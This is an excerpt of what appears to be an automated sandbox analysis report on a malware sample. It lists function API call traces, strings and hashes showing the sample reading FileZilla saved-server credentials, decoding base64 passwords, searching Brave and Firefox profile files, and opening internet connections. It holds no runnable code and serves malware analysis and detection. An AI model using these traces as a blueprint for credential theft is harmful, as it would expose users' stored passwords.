                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 1006159827-1013718255
                        • Opcode ID: 7694c56e8f04256ed396d02040c7228c829b04b6b0884fe4d6fdf0b736f54498
                        • Instruction ID: 3e582fb2e78cef5fab092a411605593ca9c2cb44ee1a7912f5467c93443eb904
                        • Opcode Fuzzy Hash: 7694c56e8f04256ed396d02040c7228c829b04b6b0884fe4d6fdf0b736f54498
                        • Instruction Fuzzy Hash: DF621631A10216ABDB21AF75CD48AAFB3B9AF44346F40412AFC05A3351DB7CDD45CBA8
                        Function 00456960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00456995
                        • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 004569C8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456A02
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456A29
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00456A34
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456A5D
                        • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00456A77
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456A99
                        • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00456AA5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456AD0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456B00
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00456B35
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00456B9D
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00456BCD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 313953988-555421843
                        • Opcode ID: e16dfdd1f9c6380493f652f94f538d089255856361f9e9871298c00be2e77f6c
                        • Instruction ID: dd45b959c05c38fa2962c1a8c8a3960113d4a609ae56fd6c8c29c45828d69b26
                        • Opcode Fuzzy Hash: e16dfdd1f9c6380493f652f94f538d089255856361f9e9871298c00be2e77f6c
                        • Instruction Fuzzy Hash: EE42E570A10201ABDB15ABB1DD49A6FBBBAAF04305F84542AFC05E7352DB7CDC45CB68
                        Function 0044DB99 Relevance: 125.0, APIs: 68, Strings: 3, Instructions: 763stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044DBC1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DBE4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044DBEF
                        • lstrlen.KERNEL32(00474CA8), ref: 0044DBFA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DC17
                        • lstrcat.KERNEL32(00000000,00474CA8), ref: 0044DC23
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DC4C
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044DC8F
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044DCBF
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0044DCD0
                        • StrCmpCA.SHLWAPI(?,004717A0), ref: 0044DCF0
                        • StrCmpCA.SHLWAPI(?,004717A4), ref: 0044DD0A
                        • lstrlen.KERNEL32(0046CFEC), ref: 0044DD1D
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044DD47
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DD70
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044DD7B
                        • lstrlen.KERNEL32(00471794), ref: 0044DD86
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DDA3
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044DDAF
                        • lstrlen.KERNEL32(?), ref: 0044DDBC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DDDF
                        • lstrcat.KERNEL32(00000000,?), ref: 0044DDED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DE19
                        • lstrlen.KERNEL32(00471794), ref: 0044DE3D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044DE6F
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044DE7B
                        • lstrlen.KERNEL32(01588F48), ref: 0044DE8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DEB0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044DEBB
                        • lstrlen.KERNEL32(00471794), ref: 0044DEC6
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044DEE6
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044DEF2
                        • lstrlen.KERNEL32(015891C8), ref: 0044DF01
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DF27
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044DF32
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DF5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DFA5
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044DFB1
                        • lstrlen.KERNEL32(01588F48), ref: 0044DFC0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044DFE9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044DFF4
                        • lstrlen.KERNEL32(00471794), ref: 0044DFFF
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E022
                        • lstrcat.KERNEL32(00000000,00471794), ref: 0044E02E
                        • lstrlen.KERNEL32(015891C8), ref: 0044E03D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E063
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0044E06E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E09A
                        • StrCmpCA.SHLWAPI(?,Brave), ref: 0044E0CD
                        • StrCmpCA.SHLWAPI(?,Preferences), ref: 0044E0E7
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044E11F
                        • lstrlen.KERNEL32(0158D250), ref: 0044E12E
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E155
                        • lstrcat.KERNEL32(00000000,?), ref: 0044E15D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E19F
                        • lstrcat.KERNEL32(00000000), ref: 0044E1A9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0044E1D0
                        • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0044E1F9
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 0044E22F
                        • lstrlen.KERNEL32(015892A8), ref: 0044E23D
                        • lstrcpy.KERNEL32(00000000,?), ref: 0044E261
                        • lstrcat.KERNEL32(00000000,015892A8), ref: 0044E269
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0044E988
                        • FindClose.KERNEL32(00000000), ref: 0044E997
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                        • String ID: Brave$Preferences$\Brave\Preferences
                        • API String ID: 1346089424-1230934161
                        • Opcode ID: a5f5c37965a23e37b553250ef07e241eaf25c025ab73c82d4a4ab328026ff0cd
                        • Instruction ID: 17b3a1149374bb74a0c1a57735d2d196286a466ac91fd9e5d1bc71ea8c404d75
                        • Opcode Fuzzy Hash: a5f5c37965a23e37b553250ef07e241eaf25c025ab73c82d4a4ab328026ff0cd
                        • Instruction Fuzzy Hash: 5B527070A102069BEB25EF75DD89AAF77B9BF44304F44412AF809A7351DB78DC41CBA8
                        Function 004460D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 004460FF
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00446152
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00446185
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004461B5
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004461F0
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00446223
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00446233
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$InternetOpen
                        • String ID: "$------
                        • API String ID: 2041821634-2370822465
                        • Opcode ID: 0406e270107e6eb6832b3dd77ac076b1273b9f18fbe0479995b1db8271a0fe4f
                        • Instruction ID: 7d12eb43b217a29205652a4f7fad68ad2011790113639ab8a91f54856dd7d3b8
                        • Opcode Fuzzy Hash: 0406e270107e6eb6832b3dd77ac076b1273b9f18fbe0479995b1db8271a0fe4f
                        • Instruction Fuzzy Hash: 0152A171A102159BEB21EFB5DC48AAFB7B9AF05304F45402AF805E7351DB78DC41CBA9
                        Function 00456B79 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00456B9D
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00456BCD
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00456BFD
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00456C2F
                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00456C3C
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00456C43
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00456C5A
                        • lstrlen.KERNEL32(00000000), ref: 00456C65
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456CA8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456CCF
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 00456CE2
                        • lstrlen.KERNEL32(00000000), ref: 00456CED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456D30
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456D57
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00456D6A
                        • lstrlen.KERNEL32(00000000), ref: 00456D75
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456DB8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456DDF
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00456DF2
                        • lstrlen.KERNEL32(00000000), ref: 00456E01
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456E49
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00456E71
                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00456E94
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00456EA8
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00456EC9
                        • LocalFree.KERNEL32(00000000), ref: 00456ED4
                        • lstrlen.KERNEL32(?), ref: 00456F6E
                        • lstrlen.KERNEL32(?), ref: 00456F81
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 2641759534-2314656281
                        • Opcode ID: 992d9b1f4740ea89dca6902495dcebe7690ea8d64d508b40d949796ea8b76ead
                        • Instruction ID: 026329978e94531ed0b024502b9058c64d17ced9b7a0edd89c1b161a37c49ded
                        • Opcode Fuzzy Hash: 992d9b1f4740ea89dca6902495dcebe7690ea8d64d508b40d949796ea8b76ead
                        • Instruction Fuzzy Hash: 9B02E130A10201AFDB25ABB0DD49AAFBBBAAF04705F54541AFC05E7352DB7CDC458B68
                        Function 00454B10 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00454B51
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454B74
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00454B7F
                        • lstrlen.KERNEL32(00474CA8), ref: 00454B8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454BA7
                        • lstrcat.KERNEL32(00000000,00474CA8), ref: 00454BB3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00454BDE
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00454BFA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID: prefs.js
                        • API String ID: 2567437900-3783873740
                        • Opcode ID: 467556326e7792c12d8b8736f8fe27b73520130dbf609a26a84fc83ab382b3fe
                        • Instruction ID: d000a3a1f55e483d6b163fa4381ae421058d3fb29f760da5ac935789aad31ed8
                        • Opcode Fuzzy Hash: 467556326e7792c12d8b8736f8fe27b73520130dbf609a26a84fc83ab382b3fe
                        • Instruction Fuzzy Hash: 27929230A016018FDB28CF29C958B6AB7F5AF44315F5980AEEC09DB3A2D779DC85CB54
                        Function 00451250 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00451291
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004512B4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004512BF
                        • lstrlen.KERNEL32(00474CA8), ref: 004512CA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004512E7
                        • lstrcat.KERNEL32(00000000,00474CA8), ref: 004512F3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045131E
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 0045133A
                        • StrCmpCA.SHLWAPI(?,004717A0), ref: 0045135C
                        • StrCmpCA.SHLWAPI(?,004717A4), ref: 00451376
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 004513AF
                        • lstrcpy.KERNEL32(00000000,?), ref: 004513D7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004513E2
                        • lstrlen.KERNEL32(00471794), ref: 004513ED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045140A
                        • lstrcat.KERNEL32(00000000,00471794), ref: 00451416
                        • lstrlen.KERNEL32(?), ref: 00451423
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451443
                        • lstrcat.KERNEL32(00000000,?), ref: 00451451
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0045147A
                        • StrCmpCA.SHLWAPI(?,0158D418), ref: 004514A3
                        • lstrcpy.KERNEL32(00000000,?), ref: 004514E4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045150D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451535
                        • StrCmpCA.SHLWAPI(?,0158D810), ref: 00451552
                        • lstrcpy.KERNEL32(00000000,?), ref: 00451593
                        • lstrcpy.KERNEL32(00000000,?), ref: 004515BC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004515E4
                        • StrCmpCA.SHLWAPI(?,0158D388), ref: 00451602
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451633
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045165C
                        • lstrcpy.KERNEL32(00000000,?), ref: 00451685
                        • StrCmpCA.SHLWAPI(?,0158D2F8), ref: 004516B3
                        • lstrcpy.KERNEL32(00000000,?), ref: 004516F4
                        • lstrcpy.KERNEL32(00000000,?), ref: 0045171D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00451745
                        • lstrcpy.KERNEL32(00000000,?), ref: 00451796
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004517BE
                        • lstrcpy.KERNEL32(00000000,?), ref: 004517F5
                        • FindNextFileA.KERNEL32(00000000,?), ref: 0045181C
                        • FindClose.KERNEL32(00000000), ref: 0045182B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                        • String ID:
                        • API String ID: 1346933759-0
                        • Opcode ID: e614aad7bbf0d4a59fb752f61254166b856b8472a709aaa58d8a61deef83cb24
                        • Instruction ID: 9e3ca43a23a5202377f91178baf137eccc1d10db28c0a73dd4c87e919bb7d082
                        • Opcode Fuzzy Hash: e614aad7bbf0d4a59fb752f61254166b856b8472a709aaa58d8a61deef83cb24
                        • Instruction Fuzzy Hash: D812A170A102069BDB24EF79DD89AAF77B9AF04305F44452EFC4A93361DB38DC458BA4
                        Function 0045CBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 0045CBFC
                        • FindFirstFileA.KERNEL32(?,?), ref: 0045CC13
